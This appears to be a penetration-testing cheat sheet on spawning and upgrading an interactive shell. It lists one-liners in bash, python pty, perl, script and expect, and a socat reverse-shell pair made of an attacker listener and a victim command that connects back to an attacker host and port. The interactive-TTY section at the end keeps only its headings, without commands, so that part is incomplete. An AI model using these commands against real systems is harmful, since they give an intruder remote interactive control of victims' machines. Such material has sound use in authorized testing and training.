Spawn TTY
Bash
/bin/bash -i
echo os.system('/bin/bash')
/bin/sh -iPython
python -c "import pty; pty.spawn('/bin/bash')"Perl
perl -e 'exec "/bin/bash";'Socat
On the attacker machine, set up socat listener: replace 4444 with your listening port.
socat -,raw,echo=0 tcp-listen:4444On the victim machine, connect back the attacker machine and spawn a shell. Replace <host> with attacker IP and <port> with attacker listing port.
$ socat exec:"/bin/bash -li",pty,stderr,setsid,sigint,sane tcp:<host>:<port>Misc
/usr/bin/script -qc /bin/bash /dev/null
/usr/bin/expect shInteractive TTY
Backgrounding the remote shell with CTRL-Z:
user@remote:~$ ^ZGetting ROWS and COLS within current terminal window:
Ignoring hotkeys in the local shell and getting back to the remote:
Setting correct size for the remote shell (where
ROWSandCOLSare the values from the 3rd bullet):
Adding some colors:
Reloading bash to apply the TERM variable:
Last updated
Was this helpful?